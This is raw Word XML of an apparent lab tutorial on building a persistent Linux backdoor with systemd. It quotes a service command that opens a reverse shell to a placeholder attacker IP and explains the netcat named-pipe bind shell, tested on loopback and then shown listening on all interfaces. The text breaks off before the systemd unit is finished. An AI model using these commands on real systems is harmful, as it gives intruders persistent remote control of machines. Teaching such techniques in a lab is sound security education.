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38B" w14:textId="67B54768" w:rsidR="00373B11" w:rsidRDefault="001B6C17" w:rsidP="001B6C17">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Using systemd to make a persistent backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30815539" w14:textId="3BE0C6C7" w:rsidR="00A92EF6" w:rsidRPr="00A92EF6" w:rsidRDefault="00A92EF6" w:rsidP="00A92EF6">
      <w:r>
        <w:t>This document shows the winding route I took to arrive at a working backdoor.  There were errors along the way, and they are included to demonstrate even simple tasks take persistence to complete.  If you want to skip the errors, go to “Cut to the Chase” near the end of the document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F238704" w14:textId="30D79F63" w:rsidR="001B6C17" w:rsidRDefault="001B6C17">
      <w:r>
        <w:t xml:space="preserve">When an attacker breaks into a machine, the attacker usually wants to make a backdoor so the attacker can connect back to the machine whenever they want.  This article, </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="005E081C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://medium.com/@airman604/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>, shows several ways to create back doors.  Since the lab we have been working on uses systemd, we will use systemd to make the backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCB073A" w14:textId="6364C993" w:rsidR="001B6C17" w:rsidRDefault="001B6C17">
      <w:r>
        <w:t>Paragraph 7 of the article lists backdoors using services, and the section (Newer) systemd Way shows the basics of what we will do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C960736" w14:textId="3C5AAC3E" w:rsidR="00865BFA" w:rsidRDefault="00865BFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D8EA288" wp14:editId="797577B8">
            <wp:extent cx="5295900" cy="454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232307A4" w14:textId="14C22D15" w:rsidR="001B6C17" w:rsidRDefault="00865BFA" w:rsidP="00865BFA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>First, test the command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311FF7BC" w14:textId="12ADEF88" w:rsidR="001B6C17" w:rsidRDefault="00865BFA">
      <w:r>
        <w:t>It is best if you practice on the same OS version as the target before you try to exploit it.  We will use Ubuntu Desktop 20.04.</w:t>
      </w:r>
      <w:r w:rsidR="0050462B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00AD78A5">
        <w:t xml:space="preserve">The data above, from </w:t>
      </w:r>
      <w:r w:rsidR="00AD78A5" w:rsidRPr="00734D85">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>[Unit]</w:t>
      </w:r>
      <w:r w:rsidR="00AD78A5">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00AD78A5" w:rsidRPr="00734D85">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Wantedby=multi-user.target</w:t>
      </w:r>
      <w:r w:rsidR="00AD78A5">
        <w:t xml:space="preserve">, is put into a file that defines the systemd service.  The format for the file is very specific—look here for more information </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00AD78A5" w:rsidRPr="005E081C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.shellhacks.com/systemd-service-file-example/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AD78A5">
        <w:t xml:space="preserve">. The important part for us to start with is </w:t>
      </w:r>
      <w:r w:rsidR="00AD78A5">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A92EF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC2B948" w14:textId="77777777" w:rsidR="00C55EFF" w:rsidRDefault="00AD78A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The command the service executes is</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AD78A5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/usr/bin/nc -e /bin/bash &lt;ATTACKER_IP&gt; &lt;PORT&gt; 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253355A2" w14:textId="1D3B4870" w:rsidR="00C55EFF" w:rsidRDefault="002F4B62">
      <w:r>
        <w:t xml:space="preserve">Note:  nc, aka netcat, is a powerful utility for reading and writing to the network.  See </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="005E081C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Netcat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> .  If netcat is blocked or not available (Windows), use the new improved version ncat  </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="005E081C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nmap.org/ncat/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidR="00C55EFF">
        <w:t xml:space="preserve">  See the netcat cheat sheet at </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00C55EFF" w:rsidRPr="005E081C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.sans.org/blog/sans-cheat-sheet-netcat/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C55EFF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F008EF7" w14:textId="2EA9050B" w:rsidR="00AD78A5" w:rsidRPr="00AD78A5" w:rsidRDefault="00AD78A5">
      <w:r w:rsidRPr="00AD78A5">
        <w:t xml:space="preserve">We can test </w:t>
      </w:r>
      <w:r w:rsidR="002F4B62">
        <w:t>the command above</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD78A5">
        <w:t xml:space="preserve"> on our Ubuntu VM.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  I will change </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD78A5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;ATTACKER_IP&gt; &lt;PORT&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the loopback 127.0.0.1 1234.</w:t>
      </w:r>
      <w:r w:rsidR="002F4B62">
        <w:t xml:space="preserve">  Note:  I’m skipping steps here, but I just want to see if the command runs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116E2B7F" w14:textId="3CE625C5" w:rsidR="00AD78A5" w:rsidRDefault="00AD78A5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61F83813" wp14:editId="70785E9F">
            <wp:extent cx="6315075" cy="368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8537" cy="374936"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6443C324" w14:textId="5C5E00E1" w:rsidR="00AD78A5" w:rsidRDefault="00AD78A5">
      <w:r>
        <w:t>Nothing.  Remove the 2&gt;/dev/null that sends errors to the trash.</w:t>
      </w:r>
      <w:r w:rsidR="003076FB">
        <w:br/>
      </w:r>
      <w:r w:rsidR="003076FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DCFCD77" wp14:editId="6507192F">
            <wp:extent cx="6315075" cy="101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962" cy="1026371"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D54ABA8" w14:textId="732DB502" w:rsidR="003076FB" w:rsidRDefault="003076FB">
      <w:r>
        <w:t>It appears the -e option is not available in this installation of netcat (nc).</w:t>
      </w:r>
      <w:r w:rsidR="002F4B62">
        <w:t xml:space="preserve">  The -e option is the core to this backdoor.  It tells netcat to execute a shell (/bin/bash in this case) to allow the attacker to remotely control the computer.  It has been omitted from the nc installed on Ubuntu 20.04 Desktop for obvious security reasons.  However, if we search the manual for netcat (man nc) for the -e option we find this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0708259F" w14:textId="77777777" w:rsidR="00752DC6" w:rsidRDefault="002F4B62">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="495C0800" wp14:editId="1D7A6D09">
            <wp:extent cx="6249670" cy="198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6701" cy="255343"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8602EA" w14:textId="248E6D69" w:rsidR="002F4B62" w:rsidRDefault="00C55EFF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Use /-e to search for the -e option.</w:t>
      </w:r>
      <w:r w:rsidR="002F4B62">
        <w:br/>
      </w:r>
      <w:r w:rsidR="002F4B62">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74718124" wp14:editId="5E1CE66C">
            <wp:extent cx="6257925" cy="31765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479" cy="3186494"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B491414" w14:textId="154C4029" w:rsidR="00C55EFF" w:rsidRDefault="00C55EFF">
      <w:r>
        <w:t>You will find the -e option is missing, but if you scroll far enough you will find this gem:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1055DCE4" wp14:editId="4E218B7C">
            <wp:extent cx="6219825" cy="3018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2769" cy="3024855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29462C74" w14:textId="6628A303" w:rsidR="003F5151" w:rsidRPr="003F5151" w:rsidRDefault="00734D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The ‘server’ side is what we are interested in.  Note:  I will call the server side the listener.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003F5151" w:rsidRPr="003F5151">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>rm -f /tmp/f; mkfifo /tmp/f</w:t>
      </w:r>
      <w:r w:rsidR="003F5151" w:rsidRPr="003F5151">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:br/>
        <w:t>cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc -l 127.0.0.1 1234 &gt; /tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3619C49D" w14:textId="7CDDDAEC" w:rsidR="00C55EFF" w:rsidRDefault="00C55EFF">
      <w:r>
        <w:t>The first line,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C55EFF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>rm -f /tmp/f; mkfifo /tmp/f</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">creates a named pipe, or FIFO (first in first out) buffer in the /tmp directory </w:t>
      </w:r>
      <w:r w:rsidR="00734D85">
        <w:t>with a name,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ‘f’.  The first part removes the named pipe in case it is left over from a previous attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F72FFB0" w14:textId="6FEF28E9" w:rsidR="00C55EFF" w:rsidRPr="00C55EFF" w:rsidRDefault="00C55EFF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The second line is complicated:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C55EFF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc -l 127.0.0.1 1234 &gt; /tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFC71BF" w14:textId="623BFD57" w:rsidR="00C55EFF" w:rsidRDefault="00C55EFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>This is what it does:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DA3EB3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/bin/sh -i</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">opens a Bourne shell (sh) in interactive mode.  You could also use /bin/bash, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00734D85">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is on almost every Linux distribution</w:t>
      </w:r>
      <w:r w:rsidR="00DA3EB3">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DA3EB3">
        <w:t>2&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidR="00DA3EB3">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DA3EB3">
        <w:tab/>
        <w:t xml:space="preserve">send the standard error stream (2, STDERR) the same place that the output (1, STDOUT) goes, piping both into </w:t>
      </w:r>
      <w:r w:rsidR="00DA3EB3" w:rsidRPr="00734D85">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r w:rsidR="00DA3EB3">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DA3EB3" w:rsidRPr="00C55EFF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc -l 127.0.0.1 1234</w:t>
      </w:r>
      <w:r w:rsidR="00DA3EB3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> creates a netcat listener on the local loopback address, </w:t>
      </w:r>
      <w:r w:rsidR="007446C3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP </w:t>
      </w:r>
      <w:r w:rsidR="00DA3EB3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>port 1234</w:t>
      </w:r>
      <w:r w:rsidR="00DA3EB3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DA3EB3" w:rsidRPr="00DA3EB3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&gt; /tmp/f</w:t>
      </w:r>
      <w:r w:rsidR="00DA3EB3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>send the netcat output to the named pipe we created</w:t>
      </w:r>
      <w:r w:rsidR="00DA3EB3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DA3EB3" w:rsidRPr="00DA3EB3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cat /tmp/f</w:t>
      </w:r>
      <w:r w:rsidR="00DA3EB3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>send the contents of the named pipe to the input of the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5667E9A6" w14:textId="4727DDBF" w:rsidR="00DA3EB3" w:rsidRDefault="00DA3EB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">So, whoever is connected to the nc listener sends commands.  </w:t>
      </w:r>
      <w:r w:rsidR="007446C3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The netcat listener sends t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">hose commands to the named pipe.  The contents of the named pipe are given to the shell as input.  The output and error streams of the shell are sent to the nc listener, which sends them on to the person connected to the listener.  If you want a better explanation, see </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="005E081C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
          </w:rPr>
          <w:t>https://web.archive.org/web/20130627142420/https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the original blog describing this</w:t>
      </w:r>
      <w:r w:rsidR="007446C3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> by its inventor, Ed Skoudis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F00CEF6" w14:textId="6AE9E24E" w:rsidR="00DA3EB3" w:rsidRDefault="003F5151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Let’s see if this method works.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CB5913B" wp14:editId="7F2FE179">
            <wp:extent cx="5991225" cy="6619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4170" cy="670028"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="299BB436" w14:textId="4B7BDD2D" w:rsidR="003F5151" w:rsidRDefault="003F5151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">It may be running.  </w:t>
      </w:r>
      <w:r w:rsidR="007446C3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If we run ss -nat to check for TCP listening </w:t>
      </w:r>
      <w:r w:rsidR="00752DC6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ports,</w:t>
      </w:r>
      <w:r w:rsidR="007446C3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> we see that there is indeed a process listening on 127.0.0.1 port 1234.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Try to connect to the nc listener.  Note:  We are using the loopback address so we can do this with only one machine.  We will connect to the listener using another terminal window which simulates an attacker machine.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="007446C3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="027962CF" wp14:editId="7FE1A4EC">
            <wp:extent cx="5962650" cy="11843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055" cy="1186230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9A5B05" w14:textId="6F80BB32" w:rsidR="003F5151" w:rsidRDefault="003F5151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Hmm, we got a ‘$’ prompt back.  </w:t>
      </w:r>
      <w:r w:rsidR="007446C3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Note:  we do not always get a prompt.  It may just be an empty line with the cursor waiting for us to enter commands.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>What happens if we enter commands?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75A56244" wp14:editId="465853D1">
            <wp:extent cx="5981700" cy="212682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2338" cy="2130609"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C80B6D" w14:textId="5CC42DC5" w:rsidR="003F5151" w:rsidRDefault="003F5151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">WooHoo!!  </w:t>
      </w:r>
      <w:r w:rsidR="007446C3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>I have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> entered some standard reconnaissance commands, and they all work.</w:t>
      </w:r>
      <w:r w:rsidR="004E4752">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  The </w:t>
      </w:r>
      <w:r w:rsidR="004E4752" w:rsidRPr="004E4752">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:r w:rsidR="004E4752">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command prints the working directory, </w:t>
      </w:r>
      <w:r w:rsidR="004E4752" w:rsidRPr="004E4752">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>uname -a</w:t>
      </w:r>
      <w:r w:rsidR="004E4752">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> gives us Linux version info, </w:t>
      </w:r>
      <w:r w:rsidR="004E4752" w:rsidRPr="004E4752">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r w:rsidR="004E4752">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells us </w:t>
      </w:r>
      <w:r w:rsidR="007446C3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="004E4752">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> username we are using, and </w:t>
      </w:r>
      <w:r w:rsidR="004E4752" w:rsidRPr="004E4752">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cat /etc/lsb-release</w:t>
      </w:r>
      <w:r w:rsidR="004E4752">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> gives us Ubuntu version information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CE968D" w14:textId="5A346641" w:rsidR="00A77E33" w:rsidRDefault="00A77E33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>We have a working command!  Yes!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F22D55" w14:textId="69E0E54E" w:rsidR="00A77E33" w:rsidRDefault="00A77E33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Note:  </w:t>
      </w:r>
      <w:r w:rsidR="004E4752">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>If you want to use this command between two machines instead of pretending that the second terminal is another machine, change the second line to be this by removing 127.0.0.1:</w:t>
      </w:r>
      <w:r w:rsidR="004E4752">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004E4752" w:rsidRPr="003F5151">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc -l 1234 &gt; /tmp/f</w:t>
      </w:r>
      <w:r w:rsidR="004E4752">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004E4752" w:rsidRPr="004E4752">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>This tells nc to listen on any interface instead of just the loopback interface.</w:t>
      </w:r>
